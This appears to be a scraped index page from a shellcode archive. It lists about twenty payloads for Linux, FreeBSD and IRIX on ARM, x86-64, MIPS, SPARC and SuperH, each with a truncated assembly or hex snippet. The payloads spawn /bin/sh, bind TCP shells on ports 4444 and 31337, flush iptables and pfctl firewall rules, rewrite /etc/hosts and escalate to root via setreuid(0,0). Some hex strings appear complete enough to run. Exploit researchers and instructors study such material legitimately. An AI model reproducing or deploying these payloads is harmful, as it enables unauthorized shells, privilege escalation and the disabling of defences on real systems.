Linux/StrongARM - execve (/bin/sh) Shellcode (47 bytes)

/ 47 byte StrongARM/Linux execve shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x1c\x30\x8f\xe2" / add r3, pc, 28 0x1c / "\x04\x30\x8d\xe5" / str r3, sp, 4 / "\x08\x20\x8d\xe5" / str r2, sp, 8 / "\x13\x02\xa0\xe1" / mov r0, r3, lsl r2 / "\x07\x20\xc3\xe5" / strb r2, r...

Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)

/ global start section .text start: ;open push 2 pop rax xor rdi, rdi push rdi ; 0x00 mov rbx, 0x7374736f682f2f2f ; ///hosts push rbx mov rbx, 0x2f2f2f2f6374652f ; /etc//// push rbx push rsp pop rdi xor rsi,rsi mov sil,4 sal rsi,8 mov sil,1 syscall ;write push rax pop rdi push 1 pop rax jmp data...

Linux/x86-64 - execve (/sbin/iptables, [/sbin/iptables, -F], NULL) Shellcode (43 bytes)

/ section .text global start start: push 0x3b pop rax cdq push rdx push word 0x462d push rsp pop rcx push rdx mov rbx, 0x73656c6261747069 push rbx mov rbx, 0x2f2f2f6e6962732f push rbx push rsp pop rdi push rdx push rcx push rdi push rsp pop rsi ; execve"/sbin/iptables", "/sbin/iptables", "-F",...

Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)

/ global start section .text start: push 59 pop rax cdq push rdx mov rbx,0x68732f6e69622f2f push rbx push rsp pop rdi push rdx push rdi push rsp pop rsi syscall / include include char code = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"; // cha...

Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)

/ Execute /bin/sh - 27 bytes Dad 0x7ffff7aeff20 : mov eax,0x3b ; 0x7ffff7aeff25 : syscall ; main: ;mov rbx, 0x68732f6e69622f2f ;mov rbx, 0x68732f6e69622fff ;shr rbx, 0x8 ;mov rax, 0xdeadbeefcafe1dea ;mov rbx, 0xdeadbeefcafe1dea ;mov rcx, 0xdeadbeefcafe1dea ;mov rdx, 0xdeadbeefcafe1dea xor eax, ea...

IRIX - stdin-read Shellcode (40 bytes)

/ 40 byte MIPS/Irix PIC stdin-read shellcode. -scut/teso / unsigned long int shellcode = 0x24048cb0, / li $a0, -0x7350 / / dpatch: / 0x0490ffff, / bltzal $a0, dpatch / 0x2804ffff, / slti $a0, $zero, -1 / 0x240fffe3, / li $t7, -29 / 0x01e07827, / nor $t7, $t7, $zero / 0x03ef2821, / addu $a1, $ra,...

Linux/ARM - execve (/bin/sh,NULL,0) Shellcode (31 bytes)

/ Title: Linux/ARM - execve"/bin/sh",NULL,0 - 31 bytes Date: 2010-08-31 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan - twitter: @jonathansalwan shell-storm.org Shellcode ARM without 0x20, 0x0a and 0x00 00008054 : 8054: e28f3001 add r3, pc, 1 ; 0x1 8058: e12fff13 bx r3 805c: 4678 mov r0, p...

Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)

/ Title: Add map in /etc/hosts file - 79 bytes Date: 2015-03-02 Architecture: armv6l GNU/Linux Website: http://osandamalith.wordpress.com E-Mail: osandacatunseen.is Author: Osanda Malith Jayathissa @OsandaMalith hosts: file format elf32-littlearm Disassembly of section .text: 00008054 : 8054:...

Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes)

/ Bind /bin/sh on port 31337 SH4 - 132bytes main: mov 102,r3 mov 2,r4 mov 1,r5 xor r6,r6 mov.l r6,@-r15 mov.l r5,@-r15 mov.l r4,@-r15 mov 1,r4 mov r15,r5 trapa 19 mov r0,r4 mov r0,r8 xor r2,r2 mov.l r2,@-r15 mov 105,r2 mov.b r2,@-r15 mov 122,r2 mov.b r2,@-r15 xor r2,r2 mov.b r2,@-r15 mov 2,r2 mov...

Linux/SPARC - setreuid(0,0) + execve(/bin/sh) Shellcode (64 bytes)

/ Linux/SPARC setreuid0,0; execve of /bin/sh shellcode. / char c0de = / anathema / / setreuid0,0; / "\x82\x10\x20\x7e" / mov 126, %g1 / "\x92\x22\x40\x09" / sub %o1, %o1, %o1 / "\x90\x0a\x40\x09" / and %o1, %o1, %o0 / "\x91\xd0\x20\x10" / ta 0x10 / / execve of /bin/sh / "\x2d\x0b\xd8\x9a" / sethi...

IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes)

/ 364 byte MIPS/Irix PIC listening portshell shellcode. -scut/teso / unsigned long int shellcode = 0x2416fffd, / li $s6, -3 / 0x02c07027, / nor $t6, $s6, $zero / 0x01ce2025, / or $a0, $t6, $t6 / 0x01ce2825, / or $a1, $t6, $t6 / 0x240efff9, / li $t6, -7 / 0x01c03027, / nor $a2, $t6, $zero /...

Linux/SPARC - setreuid(0,0) + standard execve() Shellcode (72 bytes)

/ Linux/SPARC setreuid0, 0; necessary, /bin/sh drops privs, standard execve. / char c0de = / by michel kaempf / / setuid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" / setgid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10" / Aleph One : /...

Linux/SuperH (sh4) - execve(/bin/sh, 0, 0) Shellcode (19 bytes)

/ | Title: Linux/SuperH - sh4 execve"/bin/sh", 0, 0 - 19 bytes | Date: 2011-06-22 | Tested on: Debian-sh4 2.6.32-5-sh7751r | Author: Florian Gaultier - agix - twitter: @Agixid | | http://shell-storm.org / include include int main char shell = "\x0b\xe3"// mov 11,r3 "\x02\xc7"// mova @10,pc,r0...

Linux/ARM - creat(/root/pwned, 0777) Shellcode (39 bytes)

/ Title : Linux/ARM - creat"/root/pwned", 0777 - 39 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...

Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)

.section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mov r7, 200 // r7 = 281 socket add r7, 81 // r7 value needs to be split svc 1 // r0 = hostsockid value mov r4, r0 // save hostsockid in...

FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes)

/ Gitsnik, @dracyrys FreeBSD x8664 bindtcp with passcode, 127 bytes Passcode: R2CBw0cr / C Source: char code = \ "\x6a\x61\x58\x6a\x02\x5f\x6a\x01\x5e\x99" "\x0f\x05\x48\x97\xba\xff\x02\xaa\xaa\x80" "\xf2\xff\x52\x48\x89\xe6\x99\x04\x66\x80" "\xc2\x10\x0f\x05\x04\x6a\x0f\x05\x04\x1e"...

Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)

Linux/ARM Raspberry Pi - Bind TCP 0.0.0.0:4444/TCP Shell /bin/sh + Null-Free Shellcode 112 bytes. Shellcode exploit for ARM platform .section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mo...

Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)

.section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mov r7, 200 // r7 = 281 socket add r7, 81 // r7 value needs to be split svc 1 // r0 = hostsockid value mov r4, r0 // save hostsockid in...

FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes)

/ Title: FreeBSD 8.0-RELEASE/x86 '//sbin/pfctl -F all Shellcode 47 Bytes' Type: Shellcode Author: antrhacks Platform: FreeBSD 8.0-RELEASE / / ASSembly 31 c0 xor %eax,%eax 50 push %eax 68 2d 46 61 6c push $0x6c61462d 89 e1 mov %esp,%ecx 50 push %eax 68 66 63 74 6c push $0x6c746366 68 69 6e 2f 70...

FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)

/ Gitsnik, @dracyrys FreeBSD x8664 execve, 28 bytes / C source: char code = \ "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" "\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" "\x54\x5f\x52\x57\x54\x5e\x0f\x05"; Intel Assembly: global start ; ; 28 byte execve FreeBSD x8664 ; ; gitsnik@bsd64$ nasm -f elf64...